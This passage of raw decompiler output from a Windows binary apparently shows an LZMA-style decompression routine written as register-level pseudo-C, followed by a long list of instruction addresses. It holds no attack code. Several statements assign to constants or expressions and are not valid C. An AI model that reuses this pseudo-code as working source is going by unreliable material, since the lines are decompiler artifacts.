                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											L60:
                                                                    											__eflags = __ebx - 0x100;
                                                                    											if(__ebx >= 0x100) {
                                                                    												L55:
                                                                    												__al =  *(__ebp - 0x44);
                                                                    												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                    												goto L56;
                                                                    											}
                                                                    											L61:
                                                                    											__eax =  *(__ebp - 0x58);
                                                                    											__edx = __ebx + __ebx;
                                                                    											__ecx =  *(__ebp - 0x10);
                                                                    											__esi = __edx + __eax;
                                                                    											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                    											__ax =  *__esi;
                                                                    											 *(__ebp - 0x54) = __esi;
                                                                    											__edi = __ax & 0x0000ffff;
                                                                    											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                    											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                    											if( *(__ebp - 0xc) >= __ecx) {
                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                    												__cx = __ax;
                                                                    												_t217 = __edx + 1; // 0x1
                                                                    												__ebx = _t217;
                                                                    												__cx = __ax >> 5;
                                                                    												__eflags = __eax;
                                                                    												 *__esi = __ax;
                                                                    											} else {
                                                                    												 *(__ebp - 0x10) = __ecx;
                                                                    												0x800 = 0x800 - __edi;
                                                                    												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                    												__ebx = __ebx + __ebx;
                                                                    												 *__esi = __cx;
                                                                    											}
                                                                    											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                    											 *(__ebp - 0x44) = __ebx;
                                                                    											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                    												goto L60;
                                                                    											} else {
                                                                    												goto L58;
                                                                    											}
                                                                    										case 0x10:
                                                                    											L110:
                                                                    											__eflags =  *(__ebp - 0x6c);
                                                                    											if( *(__ebp - 0x6c) == 0) {
                                                                    												 *(__ebp - 0x88) = 0x10;
                                                                    												goto L170;
                                                                    											}
                                                                    											__ecx =  *(__ebp - 0x70);
                                                                    											__eax =  *(__ebp - 0xc);
                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											_t366 = __ebp - 0x70;
                                                                    											 *_t366 =  *(__ebp - 0x70) + 1;
                                                                    											__eflags =  *_t366;
                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											goto L112;
                                                                    										case 0x11:
                                                                    											L69:
                                                                    											__esi =  *(__ebp - 0x58);
                                                                    											 *(__ebp - 0x84) = 0x12;
                                                                    											L132:
                                                                    											 *(_t612 - 0x54) = _t605;
                                                                    											goto L133;
                                                                    										case 0x12:
                                                                    											goto L0;
                                                                    										case 0x13:
                                                                    											__eflags =  *(__ebp - 0x40);
                                                                    											if( *(__ebp - 0x40) != 0) {
                                                                    												_t469 = __ebp - 0x58;
                                                                    												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                    												__eflags =  *_t469;
                                                                    												 *(__ebp - 0x30) = 0x10;
                                                                    												 *(__ebp - 0x40) = 8;
                                                                    												goto L144;
                                                                    											}
                                                                    											__eax =  *(__ebp - 0x4c);
                                                                    											__ecx =  *(__ebp - 0x58);
                                                                    											__eax =  *(__ebp - 0x4c) << 4;
                                                                    											 *(__ebp - 0x30) = 8;
                                                                    											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                    											goto L130;
                                                                    										case 0x14:
                                                                    											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                    											__eax =  *(__ebp - 0x80);
                                                                    											L140:
                                                                    											 *(_t612 - 0x88) = _t533;
                                                                    											goto L1;
                                                                    										case 0x15:
                                                                    											__eax = 0;
                                                                    											__eflags =  *(__ebp - 0x38) - 7;
                                                                    											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                    											__al = __al & 0x000000fd;
                                                                    											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                    											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                    											goto L121;
                                                                    										case 0x16:
                                                                    											__eax =  *(__ebp - 0x30);
                                                                    											__eflags = __eax - 4;
                                                                    											if(__eax >= 4) {
                                                                    												_push(3);
                                                                    												_pop(__eax);
                                                                    											}
                                                                    											__ecx =  *(__ebp - 4);
                                                                    											 *(__ebp - 0x40) = 6;
                                                                    											__eax = __eax << 7;
                                                                    											 *(__ebp - 0x7c) = 0x19;
                                                                    											 *(__ebp - 0x58) = __eax;
                                                                    											goto L145;
                                                                    										case 0x17:
                                                                    											goto L145;
                                                                    										case 0x18:
                                                                    											L146:
                                                                    											__eflags =  *(__ebp - 0x6c);
                                                                    											if( *(__ebp - 0x6c) == 0) {
                                                                    												 *(__ebp - 0x88) = 0x18;
                                                                    												goto L170;
                                                                    											}
                                                                    											__ecx =  *(__ebp - 0x70);
                                                                    											__eax =  *(__ebp - 0xc);
                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											_t484 = __ebp - 0x70;
                                                                    											 *_t484 =  *(__ebp - 0x70) + 1;
                                                                    											__eflags =  *_t484;
                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											L148:
                                                                    											_t487 = __ebp - 0x48;
                                                                    											 *_t487 =  *(__ebp - 0x48) - 1;
                                                                    											__eflags =  *_t487;
                                                                    											goto L149;
                                                                    										case 0x19:
                                                                    											__eflags = __ebx - 4;
                                                                    											if(__ebx < 4) {
                                                                    												 *(__ebp - 0x2c) = __ebx;
                                                                    												L120:
                                                                    												_t394 = __ebp - 0x2c;
                                                                    												 *_t394 =  *(__ebp - 0x2c) + 1;
                                                                    												__eflags =  *_t394;
                                                                    												L121:
                                                                    												__eax =  *(__ebp - 0x2c);
                                                                    												__eflags = __eax;
                                                                    												if(__eax == 0) {
                                                                    													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                    													goto L170;
                                                                    												}
                                                                    												__eflags = __eax -  *(__ebp - 0x60);
                                                                    												if(__eax >  *(__ebp - 0x60)) {
                                                                    													goto L171;
                                                                    												}
                                                                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                    												__eax =  *(__ebp - 0x30);
                                                                    												_t401 = __ebp - 0x60;
                                                                    												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                    												__eflags =  *_t401;
                                                                    												goto L124;
                                                                    											}
                                                                    											__ecx = __ebx;
                                                                    											__eax = __ebx;
                                                                    											__ecx = __ebx >> 1;
                                                                    											__eax = __ebx & 0x00000001;
                                                                    											__ecx = (__ebx >> 1) - 1;
                                                                    											__al = __al | 0x00000002;
                                                                    											__eax = (__ebx & 0x00000001) << __cl;
                                                                    											__eflags = __ebx - 0xe;
                                                                    											 *(__ebp - 0x2c) = __eax;
                                                                    											if(__ebx >= 0xe) {
                                                                    												__ebx = 0;
                                                                    												 *(__ebp - 0x48) = __ecx;
                                                                    												L103:
                                                                    												__eflags =  *(__ebp - 0x48);
                                                                    												if( *(__ebp - 0x48) <= 0) {
                                                                    													__eax = __eax + __ebx;
                                                                    													 *(__ebp - 0x40) = 4;
                                                                    													 *(__ebp - 0x2c) = __eax;
                                                                    													__eax =  *(__ebp - 4);
                                                                    													__eax =  *(__ebp - 4) + 0x644;
                                                                    													__eflags = __eax;
                                                                    													L109:
                                                                    													__ebx = 0;
                                                                    													 *(__ebp - 0x58) = __eax;
                                                                    													 *(__ebp - 0x50) = 1;
                                                                    													 *(__ebp - 0x44) = 0;
                                                                    													 *(__ebp - 0x48) = 0;
                                                                    													L113:
                                                                    													__eax =  *(__ebp - 0x40);
                                                                    													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                    													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                    														_t392 = __ebp - 0x2c;
                                                                    														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                                                                    														__eflags =  *_t392;
                                                                    														goto L120;
                                                                    													}
                                                                    													__eax =  *(__ebp - 0x50);
                                                                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                    													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                    													__eax =  *(__ebp - 0x58);
                                                                    													__esi = __edi + __eax;
                                                                    													 *(__ebp - 0x54) = __esi;
                                                                    													__ax =  *__esi;
                                                                    													__ecx = __ax & 0x0000ffff;
                                                                    													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                    													__eflags =  *(__ebp - 0xc) - __edx;
                                                                    													if( *(__ebp - 0xc) >= __edx) {
                                                                    														__ecx = 0;
                                                                    														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                    														__ecx = 1;
                                                                    														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                    														__ebx = 1;
                                                                    														__ecx =  *(__ebp - 0x48);
                                                                    														__ebx = 1 << __cl;
                                                                    														__ecx = 1 << __cl;
                                                                    														__ebx =  *(__ebp - 0x44);
                                                                    														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                    														__cx = __ax;
                                                                    														__cx = __ax >> 5;
                                                                    														__eax = __eax - __ecx;
                                                                    														__edi = __edi + 1;
                                                                    														__eflags = __edi;
                                                                    														 *(__ebp - 0x44) = __ebx;
                                                                    														 *__esi = __ax;
                                                                    														 *(__ebp - 0x50) = __edi;
                                                                    													} else {
                                                                    														 *(__ebp - 0x10) = __edx;
                                                                    														0x800 = 0x800 - __ecx;
                                                                    														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                    														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                    														 *__esi = __dx;
                                                                    													}
                                                                    													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                    													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                    														L112:
                                                                    														_t369 = __ebp - 0x48;
                                                                    														 *_t369 =  *(__ebp - 0x48) + 1;
                                                                    														__eflags =  *_t369;
                                                                    														goto L113;
                                                                    													} else {
                                                                    														goto L110;
                                                                    													}
                                                                    												}
                                                                    												__ecx =  *(__ebp - 0xc);
                                                                    												__ebx = __ebx + __ebx;
                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                    												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                    												 *(__ebp - 0x44) = __ebx;
                                                                    												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                    													__ecx =  *(__ebp - 0x10);
                                                                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                    													__ebx = __ebx | 0x00000001;
                                                                    													__eflags = __ebx;
                                                                    													 *(__ebp - 0x44) = __ebx;
                                                                    												}
                                                                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                    												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                    													L102:
                                                                    													_t339 = __ebp - 0x48;
                                                                    													 *_t339 =  *(__ebp - 0x48) - 1;
                                                                    													__eflags =  *_t339;
                                                                    													goto L103;
                                                                    												} else {
                                                                    													goto L100;
                                                                    												}
                                                                    											}
                                                                    											__edx =  *(__ebp - 4);
                                                                    											__eax = __eax - __ebx;
                                                                    											 *(__ebp - 0x40) = __ecx;
                                                                    											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                    											goto L109;
                                                                    										case 0x1a:
                                                                    											L56:
                                                                    											__eflags =  *(__ebp - 0x64);
                                                                    											if( *(__ebp - 0x64) == 0) {
                                                                    												 *(__ebp - 0x88) = 0x1a;
                                                                    												goto L170;
                                                                    											}
                                                                    											__ecx =  *(__ebp - 0x68);
                                                                    											__al =  *(__ebp - 0x5c);
                                                                    											__edx =  *(__ebp - 8);
                                                                    											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                    											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                    											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                    											 *( *(__ebp - 0x68)) = __al;
                                                                    											__ecx =  *(__ebp - 0x14);
                                                                    											 *(__ecx +  *(__ebp - 8)) = __al;
                                                                    											__eax = __ecx + 1;
                                                                    											__edx = 0;
                                                                    											_t192 = __eax %  *(__ebp - 0x74);
                                                                    											__eax = __eax /  *(__ebp - 0x74);
                                                                    											__edx = _t192;
                                                                    											goto L80;
                                                                    										case 0x1b:
                                                                    											L76:
                                                                    											__eflags =  *(__ebp - 0x64);
                                                                    											if( *(__ebp - 0x64) == 0) {
                                                                    												 *(__ebp - 0x88) = 0x1b;
                                                                    												goto L170;
                                                                    											}
                                                                    											__eax =  *(__ebp - 0x14);
                                                                    											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                    											__eflags = __eax -  *(__ebp - 0x74);
                                                                    											if(__eax >=  *(__ebp - 0x74)) {
                                                                    												__eax = __eax +  *(__ebp - 0x74);
                                                                    												__eflags = __eax;
                                                                    											}
                                                                    											__edx =  *(__ebp - 8);
                                                                    											__cl =  *(__eax + __edx);
                                                                    											__eax =  *(__ebp - 0x14);
                                                                    											 *(__ebp - 0x5c) = __cl;
                                                                    											 *(__eax + __edx) = __cl;
                                                                    											__eax = __eax + 1;
                                                                    											__edx = 0;
                                                                    											_t275 = __eax %  *(__ebp - 0x74);
                                                                    											__eax = __eax /  *(__ebp - 0x74);
                                                                    											__edx = _t275;
                                                                    											__eax =  *(__ebp - 0x68);
                                                                    											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                    											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                    											_t284 = __ebp - 0x64;
                                                                    											 *_t284 =  *(__ebp - 0x64) - 1;
                                                                    											__eflags =  *_t284;
                                                                    											 *( *(__ebp - 0x68)) = __cl;
                                                                    											L80:
                                                                    											 *(__ebp - 0x14) = __edx;
                                                                    											goto L81;
                                                                    										case 0x1c:
                                                                    											while(1) {
                                                                    												L124:
                                                                    												__eflags =  *(__ebp - 0x64);
                                                                    												if( *(__ebp - 0x64) == 0) {
                                                                    													break;
                                                                    												}
                                                                    												__eax =  *(__ebp - 0x14);
                                                                    												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                    												__eflags = __eax -  *(__ebp - 0x74);
                                                                    												if(__eax >=  *(__ebp - 0x74)) {
                                                                    													__eax = __eax +  *(__ebp - 0x74);
                                                                    													__eflags = __eax;
                                                                    												}
                                                                    												__edx =  *(__ebp - 8);
                                                                    												__cl =  *(__eax + __edx);
                                                                    												__eax =  *(__ebp - 0x14);
                                                                    												 *(__ebp - 0x5c) = __cl;
                                                                    												 *(__eax + __edx) = __cl;
                                                                    												__eax = __eax + 1;
                                                                    												__edx = 0;
                                                                    												_t415 = __eax %  *(__ebp - 0x74);
                                                                    												__eax = __eax /  *(__ebp - 0x74);
                                                                    												__edx = _t415;
                                                                    												__eax =  *(__ebp - 0x68);
                                                                    												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                    												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                    												__eflags =  *(__ebp - 0x30);
                                                                    												 *( *(__ebp - 0x68)) = __cl;
                                                                    												 *(__ebp - 0x14) = _t415;
                                                                    												if( *(__ebp - 0x30) > 0) {
                                                                    													continue;
                                                                    												} else {
                                                                    													L81:
                                                                    													 *(__ebp - 0x88) = 2;
                                                                    													goto L1;
                                                                    												}
                                                                    											}
                                                                    											 *(__ebp - 0x88) = 0x1c;
                                                                    											L170:
                                                                    											_push(0x22);
                                                                    											_pop(_t567);
                                                                    											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                                                                    											_t535 = 0;
                                                                    											L172:
                                                                    											return _t535;
                                                                    									}
                                                                    								}
                                                                    								L171:
                                                                    								_t535 = _t534 | 0xffffffff;
                                                                    								goto L172;
                                                                    							}
                                                                    						}
                                                                    						__eax =  *(__ebp - 0x50);
                                                                    						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                    						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                    						__eax =  *(__ebp - 0x58);
                                                                    						__esi = __edx + __eax;
                                                                    						 *(__ebp - 0x54) = __esi;
                                                                    						__ax =  *__esi;
                                                                    						__edi = __ax & 0x0000ffff;
                                                                    						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                    						if( *(__ebp - 0xc) >= __ecx) {
                                                                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                    							__cx = __ax;
                                                                    							__cx = __ax >> 5;
                                                                    							__eax = __eax - __ecx;
                                                                    							__edx = __edx + 1;
                                                                    							 *__esi = __ax;
                                                                    							 *(__ebp - 0x50) = __edx;
                                                                    						} else {
                                                                    							 *(__ebp - 0x10) = __ecx;
                                                                    							0x800 = 0x800 - __edi;
                                                                    							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                    							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                    							 *__esi = __cx;
                                                                    						}
                                                                    						if( *(__ebp - 0x10) >= 0x1000000) {
                                                                    							goto L148;
                                                                    						} else {
                                                                    							goto L146;
                                                                    						}
                                                                    					}
                                                                    					goto L1;
                                                                    				}
                                                                    			}








                                                                    0x00000000
                                                                    0x00407395
                                                                    0x00407395
                                                                    0x00407399
                                                                    0x004073be
                                                                    0x004073c8
                                                                    0x00000000
                                                                    0x0040739b
                                                                    0x0040739b
                                                                    0x0040739e
                                                                    0x004073a2
                                                                    0x004073a5
                                                                    0x004073a8
                                                                    0x004073ac
                                                                    0x004073ac
                                                                    0x004073af
                                                                    0x00407489
                                                                    0x00407489
                                                                    0x00407490
                                                                    0x00407490
                                                                    0x00407493
                                                                    0x0040749a
                                                                    0x004074c7
                                                                    0x004074cb
                                                                    0x0040752b
                                                                    0x0040752e
                                                                    0x00407533
                                                                    0x00407534
                                                                    0x00407536
                                                                    0x00407538
                                                                    0x0040753b
                                                                    0x00407447
                                                                    0x00407447
                                                                    0x00407447
                                                                    0x00406be3
                                                                    0x00406be3
                                                                    0x00406be3
                                                                    0x00406bec
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406bf2
                                                                    0x00000000
                                                                    0x00406bfd
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406c06
                                                                    0x00406c09
                                                                    0x00406c0c
                                                                    0x00406c10
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406c16
                                                                    0x00406c19
                                                                    0x00406c1b
                                                                    0x00406c1c
                                                                    0x00406c1f
                                                                    0x00406c21
                                                                    0x00406c22
                                                                    0x00406c24
                                                                    0x00406c27
                                                                    0x00406c2c
                                                                    0x00406c31
                                                                    0x00406c3a
                                                                    0x00406c4d
                                                                    0x00406c50
                                                                    0x00406c5c
                                                                    0x00406c84
                                                                    0x00406c86
                                                                    0x00406c94
                                                                    0x00406c94
                                                                    0x00406c98
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406c88
                                                                    0x00406c88
                                                                    0x00406c8b
                                                                    0x00406c8c
                                                                    0x00406c8c
                                                                    0x00000000
                                                                    0x00406c88
                                                                    0x00406c62
                                                                    0x00406c67
                                                                    0x00406c67
                                                                    0x00406c70
                                                                    0x00406c78
                                                                    0x00406c7b
                                                                    0x00000000
                                                                    0x00406c81
                                                                    0x00406c81
                                                                    0x00000000
                                                                    0x00406c81
                                                                    0x00000000
                                                                    0x00406c9e
                                                                    0x00406c9e
                                                                    0x00406ca2
                                                                    0x0040754e
                                                                    0x00000000
                                                                    0x0040754e
                                                                    0x00406cab
                                                                    0x00406cbb
                                                                    0x00406cbe
                                                                    0x00406cc1
                                                                    0x00406cc1
                                                                    0x00406cc1
                                                                    0x00406cc4
                                                                    0x00406cc8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406cca
                                                                    0x00406cd0
                                                                    0x00406cfa
                                                                    0x00406d00
                                                                    0x00406d07
                                                                    0x00000000
                                                                    0x00406d07
                                                                    0x00406cd6
                                                                    0x00406cd9
                                                                    0x00406cde
                                                                    0x00406cde
                                                                    0x00406ce9
                                                                    0x00406cf1
                                                                    0x00406cf4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406d39
                                                                    0x00406d3f
                                                                    0x00406d42
                                                                    0x00406d4f
                                                                    0x00406d57
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406d0e
                                                                    0x00406d0e
                                                                    0x00406d12
                                                                    0x0040755d
                                                                    0x00000000
                                                                    0x0040755d
                                                                    0x00406d1e
                                                                    0x00406d29
                                                                    0x00406d29
                                                                    0x00406d29
                                                                    0x00406d2c
                                                                    0x00406d2f
                                                                    0x00406d32
                                                                    0x00406d37
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004073ce
                                                                    0x004073ce
                                                                    0x004073d4
                                                                    0x004073da
                                                                    0x004073e0
                                                                    0x004073fa
                                                                    0x004073fd
                                                                    0x00407403
                                                                    0x0040740e
                                                                    0x0040740e
                                                                    0x00407410
                                                                    0x004073e2
                                                                    0x004073e2
                                                                    0x004073f1
                                                                    0x004073f5
                                                                    0x004073f5
                                                                    0x0040741a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040741c
                                                                    0x00407420
                                                                    0x004075cf
                                                                    0x00000000
                                                                    0x004075cf
                                                                    0x0040742c
                                                                    0x00407433
                                                                    0x0040743b
                                                                    0x0040743e
                                                                    0x00407441
                                                                    0x00407441
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406d5f
                                                                    0x00406d61
                                                                    0x00406d64
                                                                    0x00406dd5
                                                                    0x00406dd8
                                                                    0x00406ddb
                                                                    0x00406de2
                                                                    0x00406dec
                                                                    0x00000000
                                                                    0x00406dec
                                                                    0x00406d66
                                                                    0x00406d6a
                                                                    0x00406d6d
                                                                    0x00406d6f
                                                                    0x00406d72
                                                                    0x00406d75
                                                                    0x00406d77
                                                                    0x00406d7a
                                                                    0x00406d7c
                                                                    0x00406d81
                                                                    0x00406d84
                                                                    0x00406d87
                                                                    0x00406d8b
                                                                    0x00406d92
                                                                    0x00406d95
                                                                    0x00406d9c
                                                                    0x00406da0
                                                                    0x00406da8
                                                                    0x00406da8
                                                                    0x00406da8
                                                                    0x00406da2
                                                                    0x00406da2
                                                                    0x00406da2
                                                                    0x00406d97
                                                                    0x00406d97
                                                                    0x00406d97
                                                                    0x00406dac
                                                                    0x00406daf
                                                                    0x00406dcd
                                                                    0x00406dcf
                                                                    0x00000000
                                                                    0x00406db1
                                                                    0x00406db1
                                                                    0x00406db4
                                                                    0x00406db7
                                                                    0x00406dba
                                                                    0x00406dbc
                                                                    0x00406dbc
                                                                    0x00406dbc
                                                                    0x00406dbf
                                                                    0x00406dc2
                                                                    0x00406dc4
                                                                    0x00406dc5
                                                                    0x00406dc8
                                                                    0x00000000
                                                                    0x00406dc8
                                                                    0x00000000
                                                                    0x00406ffe
                                                                    0x00407002
                                                                    0x00407020
                                                                    0x00407023
                                                                    0x0040702a
                                                                    0x0040702d
                                                                    0x00407030
                                                                    0x00407033
                                                                    0x00407036
                                                                    0x00407039
                                                                    0x0040703b
                                                                    0x00407042
                                                                    0x00407043
                                                                    0x00407045
                                                                    0x00407048
                                                                    0x0040704b
                                                                    0x0040704e
                                                                    0x0040704e
                                                                    0x00407053
                                                                    0x00000000
                                                                    0x00407053
                                                                    0x00407004
                                                                    0x00407007
                                                                    0x0040700a
                                                                    0x00407014
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407068
                                                                    0x0040706c
                                                                    0x0040708f
                                                                    0x00407092
                                                                    0x00407095
                                                                    0x0040709f
                                                                    0x0040706e
                                                                    0x0040706e
                                                                    0x00407071
                                                                    0x00407074
                                                                    0x00407077
                                                                    0x00407084
                                                                    0x00407087
                                                                    0x00407087
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004070ab
                                                                    0x004070af
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004070b5
                                                                    0x004070b9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004070bf
                                                                    0x004070c1
                                                                    0x004070c5
                                                                    0x004070c5
                                                                    0x004070c8
                                                                    0x004070cc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040711c
                                                                    0x00407120
                                                                    0x00407127
                                                                    0x0040712a
                                                                    0x0040712d
                                                                    0x00407137
                                                                    0x00000000
                                                                    0x00407137
                                                                    0x00407122
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407143
                                                                    0x00407147
                                                                    0x0040714e
                                                                    0x00407151
                                                                    0x00407154
                                                                    0x00407149
                                                                    0x00407149
                                                                    0x00407149
                                                                    0x00407157
                                                                    0x0040715a
                                                                    0x0040715d
                                                                    0x0040715d
                                                                    0x00407160
                                                                    0x00407163
                                                                    0x00407166
                                                                    0x00407166
                                                                    0x00407169
                                                                    0x00407170
                                                                    0x00407175
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407203
                                                                    0x00407203
                                                                    0x00407207
                                                                    0x004075a5
                                                                    0x00000000
                                                                    0x004075a5
                                                                    0x0040720d
                                                                    0x00407210
                                                                    0x00407213
                                                                    0x00407217
                                                                    0x0040721a
                                                                    0x00407220
                                                                    0x00407222
                                                                    0x00407222
                                                                    0x00407222
                                                                    0x00407225
                                                                    0x00407228
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406df8
                                                                    0x00406df8
                                                                    0x00406dfc
                                                                    0x00407569
                                                                    0x00000000
                                                                    0x00407569
                                                                    0x00406e02
                                                                    0x00406e05
                                                                    0x00406e08
                                                                    0x00406e0c
                                                                    0x00406e0f
                                                                    0x00406e15
                                                                    0x00406e17
                                                                    0x00406e17
                                                                    0x00406e17
                                                                    0x00406e1a
                                                                    0x00406e1d
                                                                    0x00406e1d
                                                                    0x00406e20
                                                                    0x00406e23
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406e29
                                                                    0x00406e2f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406e35
                                                                    0x00406e35
                                                                    0x00406e39
                                                                    0x00406e3c
                                                                    0x00406e3f
                                                                    0x00406e42
                                                                    0x00406e45
                                                                    0x00406e46
                                                                    0x00406e49
                                                                    0x00406e4b
                                                                    0x00406e51
                                                                    0x00406e54
                                                                    0x00406e57
                                                                    0x00406e5a
                                                                    0x00406e5d
                                                                    0x00406e60
                                                                    0x00406e63
                                                                    0x00406e7f
                                                                    0x00406e82
                                                                    0x00406e85
                                                                    0x00406e88
                                                                    0x00406e8f
                                                                    0x00406e93
                                                                    0x00406e95
                                                                    0x00406e99
                                                                    0x00406e65
                                                                    0x00406e65
                                                                    0x00406e69
                                                                    0x00406e71
                                                                    0x00406e76
                                                                    0x00406e78
                                                                    0x00406e7a
                                                                    0x00406e7a
                                                                    0x00406e9c
                                                                    0x00406ea3
                                                                    0x00406ea6
                                                                    0x00000000
                                                                    0x00406eac
                                                                    0x00000000
                                                                    0x00406eac
                                                                    0x00000000
                                                                    0x00406eb1
                                                                    0x00406eb1
                                                                    0x00406eb5
                                                                    0x00407575
                                                                    0x00000000
                                                                    0x00407575
                                                                    0x00406ebb
                                                                    0x00406ebe
                                                                    0x00406ec1
                                                                    0x00406ec5
                                                                    0x00406ec8
                                                                    0x00406ece
                                                                    0x00406ed0
                                                                    0x00406ed0
                                                                    0x00406ed0
                                                                    0x00406ed3
                                                                    0x00406ed6
                                                                    0x00406ed6
                                                                    0x00406ed6
                                                                    0x00406edc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406ede
                                                                    0x00406ee1
                                                                    0x00406ee4
                                                                    0x00406ee7
                                                                    0x00406eea
                                                                    0x00406eed
                                                                    0x00406ef0
                                                                    0x00406ef3
                                                                    0x00406ef6
                                                                    0x00406ef9
                                                                    0x00406efc
                                                                    0x00406f14
                                                                    0x00406f17
                                                                    0x00406f1a
                                                                    0x00406f1d
                                                                    0x00406f1d
                                                                    0x00406f20
                                                                    0x00406f24
                                                                    0x00406f26
                                                                    0x00406efe
                                                                    0x00406efe
                                                                    0x00406f06
                                                                    0x00406f0b
                                                                    0x00406f0d
                                                                    0x00406f0f
                                                                    0x00406f0f
                                                                    0x00406f29
                                                                    0x00406f30
                                                                    0x00406f33
                                                                    0x00000000
                                                                    0x00406f35
                                                                    0x00000000
                                                                    0x00406f35
                                                                    0x00406f33
                                                                    0x00406f3a
                                                                    0x00406f3a
                                                                    0x00406f3a
